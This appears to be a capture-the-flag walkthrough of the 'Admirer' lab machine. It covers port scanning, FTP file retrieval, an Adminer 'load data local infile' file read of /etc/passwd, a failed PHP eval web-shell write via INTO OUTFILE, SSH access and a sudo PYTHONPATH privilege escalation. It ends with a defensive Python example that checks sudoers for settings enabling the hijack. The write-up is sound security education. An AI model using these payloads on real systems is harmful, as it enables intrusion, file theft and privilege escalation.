```
C:\root\Documents\exploit> nmap 10.10.10.187
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-07 08:38 EDT
Nmap scan report for 10.10.10.187
Host is up (0.12s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 1.90 seconds
```
```
C:\root\Documents\exploit> ftp 10.10.10.187
Connected to 10.10.10.187.
220 (vsFTPd 3.0.3)
Name (10.10.10.187:root): ftpuser
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-x---    2 0        111          4096 Dec 03  2019 .
drwxr-x---    2 0        111          4096 Dec 03  2019 ..
-rw-r--r--    1 0        0            3405 Dec 02  2019 dump.sql
-rw-r--r--    1 0        0         5270987 Dec 03  2019 html.tar.gz
226 Directory send OK.
ftp> get dump.sql
local: dump.sql remote: dump.sql
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for dump.sql (3405 bytes).
226 Transfer complete.
3405 bytes received in 0.00 secs (34.5453 MB/s)
ftp> get html.tar.gz
local: html.tar.gz remote: html.tar.gz
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for html.tar.gz (5270987 bytes).
5253816 bytes received in 112.50 secs (45.6071 kB/s)
```
```sql
/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8mb4 */;
/*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE */;
/*!40103 SET TIME_ZONE='+00:00' */;
/*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 */;
/*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */;
/*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */;
/*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */;

LOCK TABLES `items` WRITE;
/*!40000 ALTER TABLE `items` DISABLE KEYS */;
INSERT INTO `items` VALUES
(1,'images/thumbs/thmb_art01.jpg','images/fulls/art01.jpg','Visual Art','A pure showcase of skill and emotion.'),
(2,'images/thumbs/thmb_eng02.jpg','images/fulls/eng02.jpg','The Beauty and the Beast','Besides the technology, there is also the eye candy...'),
(3,'images/thumbs/thmb_nat01.jpg','images/fulls/nat01.jpg','The uncontrollable lightshow','When the sun decides to play at night.'),
(4,'images/thumbs/thmb_arch02.jpg','images/fulls/arch02.jpg','Nearly Monochromatic','One could simply spend hours looking at this indoor square.'),
(5,'images/thumbs/thmb_mind01.jpg','images/fulls/mind01.jpg','Way ahead of his time','You probably still use some of his inventions... 500yrs later.'),
(6,'images/thumbs/thmb_mus02.jpg','images/fulls/mus02.jpg','The outcomes of complexity','Seriously, listen to Dust in Interstellar\'s OST. Thank me later.'),
(7,'images/thumbs/thmb_arch01.jpg','images/fulls/arch01.jpg','Back to basics','And centuries later, we want to go back and live in nature... Sort of.'),
(8,'images/thumbs/thmb_mind02.jpg','images/fulls/mind02.jpg','We need him back','He might have been a loner who allegedly slept with a pigeon, but that brain...'),
(9,'images/thumbs/thmb_eng01.jpg','images/fulls/eng01.jpg','In the name of Science','Some theories need to be proven.'),
(10,'images/thumbs/thmb_mus01.jpg','images/fulls/mus01.jpg','Equal Temperament','Because without him, music would not exist (as we know it today).');
/*!40000 ALTER TABLE `items` ENABLE KEYS */;
UNLOCK TABLES;

/*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */;
/*!40101 SET SQL_MODE=@OLD_SQL_MODE */;
/*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */;
/*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */;
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
/*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */;

-- Dump completed on 2019-12-02 20:24:15
```
The site uses adminer here; trying the account names and passwords found earlier one by one did not work either. A quick google search showed that this tool can connect to an external database server, and that, combined with load data local infile, this gives arbitrary file read.
File read
Create a local database
First create a table locally; the file we read later will be stored in this table.
```sql
create table adminer (text varchar(200));
```
Then, on the adminer login page, enter our own database address, user name, password, database name and so on. Once logged in, we can use load data local infile to read files. At first I did not understand this and kept trying load data infile: with local, the statement reads a file from the server that runs adminer; without local, it reads a file from the server that actually executes the SQL statement. So here we need to use the following statement to read the file:
```sql
load data local infile '/etc/passwd' into table adminer FIELDS TERMINATED BY '\n';
```
```sql
CREATE TABLE a (cmd text NOT NULL);
INSERT INTO a (cmd) VALUES ('<?php eval($_POST[\'password\']);?>');
SELECT cmd FROM a INTO OUTFILE '/var/www/html/chen1sheng.php';
```
However, this account has too few privileges, so the write fails with an error: Error in query (1045): Access denied for user 'waldo'@'localhost' (using password: YES). This path is therefore a dead end as well.
SSH connection
Trying ssh again with the new password succeeds; what remains is privilege escalation.
```
waldo@admirer:~$ ls
user.txt
waldo@admirer:~$ id
uid=1000(waldo) gid=1000(waldo) groups=1000(waldo),1001(admins)
waldo@admirer:~$ cat user.txt
5233f4af5a2602394f7c16426973283c
```
```
waldo@admirer:~/py$ sudo PYTHONPATH=~/py /opt/scripts/admin_tasks.sh
[sudo] password for waldo:

[[[ System Administration Menu ]]]
1) View system uptime
2) View logged in users
3) View crontab
4) Backup passwd file
5) Backup shadow file
6) Backup web data
7) Backup DB
8) Quit
Choose an option: 6
Running backup script in the background, it might take a while...
```
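The sudo PYTHONPATH step above only works because the backup step runs Python, and the interpreter searches PYTHONPATH directories before the standard library. The following added example (not code from the writeup or from the box) reproduces that resolution order in-process, shows that it no longer applies once the variable is ignored (python3 -I, or sudo's default env_reset), and adds a small check for the two sudoers settings that would let a caller's PYTHONPATH reach a root-run script. The sudoers lines are constructed, not the machine's real configuration.

```python
import re
import sys
import tempfile
from importlib.machinery import PathFinder
from pathlib import Path

MODULE = "shutil"  # a stdlib name stands in for the module the backup script imports


def resolve_origin(module: str, pythonpath: list[str], honour_pythonpath: bool) -> str:
    """Return the file `import module` would load, mirroring the interpreter's
    search order: PYTHONPATH entries come BEFORE the standard library, unless
    the variable is ignored (python3 -I, or sudo's default env_reset)."""
    base = [p for p in sys.path if p and p not in pythonpath]
    search = (pythonpath if honour_pythonpath else []) + base
    spec = PathFinder.find_spec(module, search)
    if spec is None or spec.origin is None:
        raise ImportError(f"{module} not found on {search}")
    return spec.origin


def shadow_wins(honour_pythonpath: bool) -> bool:
    """True when a same-named file in a caller-controlled directory is what the
    privileged script would import instead of the real module."""
    with tempfile.TemporaryDirectory() as tmp:
        shadow = Path(tmp) / f"{MODULE}.py"
        shadow.write_text("# constructed shadow module; only its location matters here\n")
        return Path(resolve_origin(MODULE, [tmp], honour_pythonpath)) == shadow


# Constructed sudoers lines for the check below (assumed, not the box's real config).
SUDOERS_SAMPLE = """\
Defaults env_reset
Defaults env_keep += "PYTHONPATH"
waldo ALL=(ALL) SETENV: /opt/scripts/admin_tasks.sh
"""


def pythonpath_reaches_root(sudoers: str) -> bool:
    """Flag the two sudoers settings that let a caller's PYTHONPATH survive into
    a root-run Python script: env_keep listing it, or a SETENV tag on the rule."""
    keep = re.search(r'^Defaults\s+env_keep\s*\+?=\s*"?[^"\n]*\bPYTHONPATH\b', sudoers, re.M)
    setenv = re.search(r'^\S+\s+ALL=.*\bSETENV:', sudoers, re.M)
    return bool(keep or setenv)
```

Dropping both settings (and running the privileged interpreter with -I) removes the caller's influence on module resolution without changing the script itself.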